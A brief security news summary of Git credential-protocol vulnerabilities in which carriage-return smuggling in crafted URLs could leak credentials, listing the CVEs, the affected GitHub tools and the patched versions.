RyotaK, a security researcher, has identified critical vulnerabilities in Git’s credential retrieval protocol, which could allow attackers to leak users’ credentials. This flaw arises from improper handling of newline characters (specifically carriage returns) in crafted URLs, leading to unintended value injection into the protocol stream.
Git uses a line-based protocol with credential helpers to exchange information between itself and third-party services like password managers or security systems. Attackers can exploit this by creating malicious URLs containing ANSI escape sequences or plain text that injects unauthorized values, compromising sensitive information such as usernames or passwords.
Two main vulnerabilities have been reported:
1. **CVE-2025-23040**: A “carriage return smuggling bug” in GitHub Desktop and Git LFS allows attackers to leak credentials by crafting URLs with carriage returns.
2. **CVE-2024-50338 & CVE-2024-50349**: Issues in the cross-platform credential helper for Git (Git Credential Manager) and Git LFS allow attackers to bypass security measures by manipulating newline characters.
To mitigate these risks, Git has introduced validations in its credential protocol to reject URLs containing carriage return characters. The fixes include patches for versions 2.48.1 of Git, 3.6.1 of Git LFS, and 2.6.1 of Git Credential Manager.
Previously, similar vulnerabilities were found in GitHub Codespaces and the GitHub CLI, where attackers could steal credentials by cloning malicious repositories or using improper host parameter decoding. These issues highlight the importance of robust security measures to prevent unauthorized access to sensitive information.
In response, GitHub has patched critical vulnerabilities across its product lines, emphasizing the need for continuous security updates to safeguard against evolving threats.
Source: https://www.securityweek.com/git-vulnerabilities-led-to-credentials-exposure